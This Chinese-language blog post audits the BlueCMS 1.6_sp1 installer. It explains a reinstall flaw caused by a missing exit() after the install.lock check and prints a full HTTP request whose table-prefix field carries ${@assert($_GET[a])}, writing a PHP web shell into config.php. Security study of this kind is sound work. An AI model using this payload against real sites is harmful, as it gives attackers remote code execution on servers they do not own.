代码审计-文件重装漏洞
0x00前言
今天捞了一个CMS,打算学习一下代码审计。毕竟真正的大佬都会代码审计= =
0x001环境
Phpstudy
CMS:bluecms
version:1.6_sp1
0x02牛刀小试
下载好源码解压到WWW目录,安装的时候抓包
POST /uploads/install/index.php?act=step4 HTTP/1.1
Host: 127.0.0.1
Content-Length: 180
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1/uploads/install/index.php?act=step3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=ckmi3slibob1f70ke38qesnae7
Connection: close
dbhost=localhost&dbname=bluecms&dbuser=root&dbpass=root&pre=blue_&admin_name=admin&admin_pwd=admin&admin_pwd1=admin&admin_email=fuck%40qq.com&cookie_hash=LpAOf843D
定位到/install/index.php
<?php
/*
* [bluecms]版权所有 标准网络,保留所有权利
* This is not a freeware, use is subject to license terms
*
* $Id:index.php
* $author:lucks
*/
#这几把站安装成功不会和你说安装成功了的
define('IN_BLUE', true);
require_once(dirname(__FILE__) . '/include/common.inc.php');
if(file_exists(BLUE_ROOT.'data/install.lock')){ #只判断了是否存在这个文件,然后输出了一句话,并没有退出,导致有重装漏洞
install_showmsg('您已经安装过本系统,如果想重新安装,请删除data目录下install.lock文件', '../index.php');
}
$act = !empty($_REQUEST['act']) ? trim($_REQUEST['act']) : 'step1';
if($act == 'step1'){
$install_smarty->display('step1.htm');
}
elseif($act == 'step2'){
$system_info = array();
$system_info['version'] = BLUE_VERSION;
$system_info['os'] = PHP_OS;
$system_info['ip'] = $_SERVER['SERVER_ADDR'];
$system_info['web_server'] = $_SERVER['SERVER_SOFTWARE'];
$system_info['php_ver'] = PHP_VERSION;
$system_info['max_filesize'] = ini_get('upload_max_filesize');
$dir_check = check_dirs($need_check_dirs);
install_template_assign(array('dir_check', 'system_info'), array($dir_check, $system_info));
$install_smarty->display('step2.htm');
}
elseif($act == 'step3'){
$cookie_hash = chr(mt_rand(ord('A'),ord('Z'))).chr(mt_rand(ord('a'),ord('z'))).chr(mt_rand(ord('A'),ord('Z'))).chr(mt_rand(ord('A'),ord('Z'))).chr(mt_rand(ord('a'),ord('z'))).mt_rand(1,9999).chr(mt_rand(ord('A'),ord('Z')));
install_template_assign(array('cookie_hash'),array($cookie_hash));
$install_smarty->display('step3.htm');
}
elseif($act == 'step4'){
$dbhost = isset($_POST['dbhost']) ? trim($_POST['dbhost']) : '';
$dbname = isset($_POST['dbname']) ? trim($_POST['dbname']) : '';
$dbuser = isset($_POST['dbuser']) ? trim($_POST['dbuser']) : '';
$dbpass = isset($_POST['dbpass']) ? trim($_POST['dbpass']) : '';
$pre = isset($_POST['pre']) ? trim($_POST['pre']) : 'blue_'; //表前缀
$admin_name = isset($_POST['admin_name']) ? trim($_POST['admin_name']) : ''; //admin_name处没做任何效验,可能造成二次注入
$admin_pwd = isset($_POST['admin_pwd']) ? trim($_POST['admin_pwd']) : '';
$admin_pwd1 = isset($_POST['admin_pwd1']) ? trim($_POST['admin_pwd1']) : '';
$admin_email = isset($_POST['admin_email']) ? trim($_POST['admin_email']) : ''; //email处没做任何效验,可能造成二次注入
$cookie_hash = isset($_POST['cookie_hash']) ? trim($_POST['cookie_hash']) : '';
if($dbhost == '' || $dbname == ''|| $dbuser == ''|| $admin_name == ''|| $admin_pwd == '' || $admin_pwd1 == '' || $admin_email == ''){
install_showmsg('您填写的信息不完整,请核对');
}
if($admin_pwd != $admin_pwd1){
install_showmsg('您两次输入的密码不一致');
}
if(!$db = @mysql_connect($dbhost, $dbuser, $dbpass)){
install_showmsg('连接数据库错误,请核对信息是否正确');
}
mysql_query("CREATE DATABASE IF NOT EXISTS `".$dbname."`;",$db);
$mysql_version = mysql_get_server_info($db);
if(!mysql_select_db($dbname)){
install_showmsg('选择数据库错误,请检查是否拥有权限或存在此数据库');
}
mysql_query("SET NAMES '".BLUE_CHARSET."',character_set_client=binary,sql_mode='';",$db);
$content = '<?'."php\n";
$content .= "\$dbhost = \"$dbhost\";\n\n";
$content .= "\$dbname = \"$dbname\";\n\n";
$content .= "\$dbuser = \"$dbuser\";\n\n";
$content .= "\$dbpass = \"$dbpass\";\n\n";
$content .= "\$pre = \"$pre\";\n\n";
$content .= "\$cookiedomain = '';\n\n";
$content .= "\$cookiepath = '/';\n\n";
$content .= "define('BLUE_CHARSET','".BLUE_CHARSET."');\n\n";
$content .= "define('BLUE_VERSION','".BLUE_VERSION."');\n\n";
$content .= '?>';
$fp = @fopen(BLUE_ROOT . 'data/config.php', 'wb+');
if (!$fp){
install_showmsg('打开配置文件失败');
}
if (!@fwrite($fp, trim($content))){
install_showmsg('写入配置文件失败');
}
@fclose($fp);
$fp = @fopen(BLUE_ROOT . 'data/update_log.txt', 'wb+');
if(!$fp){
install_showmsg('打开更新日志文件失败');
}
if(!@fwrite($fp, BLUE_UPDATE_NO)){
install_showmsg('写入更新文件失败');
}
@fclose($fp);
if(!$fp = @fopen(dirname(__FILE__).'/sql-structure.sql','rb')){
install_showmsg('打开文件sql-structure.sql出错,请检查文件是否存在');
}
$query = '';
while(!feof($fp))
{
$line = rtrim(fgets($fp,1024));
if(preg_match('/;$/',$line))
{
$query .= $line."\n";
$query = str_replace('blue_',$pre,$query);
if ( $mysql_version > 4.1 )
{
mysql_query(str_replace("TYPE=MyISAM", "ENGINE=MyISAM DEFAULT CHARSET=gbk", $query), $db);
}
else
{
mysql_query($query, $db);
}
$query='';
}
else if(!ereg('/^(//|--)/',$line))
{
$query .= $line;
}
}
@fclose($fp);
$query = '';
if(!$fp = @fopen(dirname(__FILE__).'/sql-data.sql','rb')){
install_showmsg('打开文件sql-data.sql出错,请检查文件是否存在');
}
while(!feof($fp)){
$line = rtrim(fgets($fp,1024));
if(ereg(";$",$line)){
$query .= $line;
$query = str_replace('blue_',$pre,$query);
mysql_query($query,$db);
$query='';
}
else if(!ereg("^(//|--)",$line)){
$query .= $line;
}
}
fclose($fp);
$site_url = "http://".$_SERVER['SERVER_NAME'].substr(dirname($php_self), 0, -8);
mysql_query("UPDATE `".$pre."config` SET value = '".$cookie_hash."' WHERE name = 'cookie_hash'", $db);
mysql_query("UPDATE `".$pre."config` SET value = '".$site_url."' WHERE name = 'site_url'", $db);
mysql_query("INSERT INTO `".$pre."admin` (admin_id, admin_name, email, pwd, purview, add_time, last_login_time, last_login_ip) VALUES (1, '$admin_name', '$admin_email', md5('$admin_pwd'), 'all', '$timestamp', '$timestamp', '')", $db);
mysql_query("INSERT INTO ".$pre."user (user_id, user_name, pwd, email, birthday, sex, money, face_pic, mobile_phone, home_phone, office_phone, qq, msn, address, reg_time, last_login_time, last_login_ip) VALUES (1, '$admin_name', md5('$admin_pwd'), '$admin_email', '0000-00-00', 0, '0.00', '', '', '', '', '', '', '', '$timestamp', '$timestamp', '')", $db);
header('Location:index.php?act=step5');
}
elseif($act == 'step5')
{
define('IN_BLUE', TRUE);
include dirname(__FILE__) . '/../include/common.inc.php';
include BLUE_ROOT . 'admin/include/common.fun.php';
update_data_cache();
update_pay_cache();
if(is_writable(BLUE_ROOT.'data/'))
{
$fp = @fopen(BLUE_ROOT.'data/install.lock', 'wb+');
fwrite($fp, 'OK');
fclose($fp);
}
$install_smarty->display('step5.htm');
}
?>
漏洞点出现在14行
if(file_exists(BLUE_ROOT.'data/install.lock')){ #只判断了是否存在这个文件,然后输出了一句话,并没有退出,导致有重装漏洞
install_showmsg('您已经安装过本系统,如果想重新安装,请删除data目录下install.lock文件', '../index.php');
}
判断完没有马上exit()退出,导致程序可以继续执行。可以无限重装
GIF
尝试加入双引号想逃逸出双引号来写shell,发现被过滤了
后面想了半天没想懂。。看了一下别的文章发现是common.inc.php在作祟
addslashes()过滤掉了特殊字符,后面经过青鸟表哥的一波指点
${@assert($_GET[a])}
就可以做shell来使用了,至于为什么自己试assert($_GET[_])不行,我也不清楚= =
POST /uploads/install/index.php?act=step4 HTTP/1.1
Host: 127.0.0.1
Content-Length: 180
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1/uploads/install/index.php?act=step3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=ckmi3slibob1f70ke38qesnae7
Connection: close
dbhost=localhost&dbname=bluecms&dbuser=root&dbpass=root&pre=${@assert($_GET[a])}&admin_name=admin&admin_pwd=admin&admin_pwd1=admin&admin_email=fuck%40qq.com&cookie_hash=LpAOf843D
最后结果
0x03参考链接
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:代码审计-文件重装漏洞
本文作者:九世
发布时间:2019-11-26, 21:43:50
最后更新:2019-11-26, 22:15:24
原始链接:http://jiushill.github.io/posts/1f457874.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。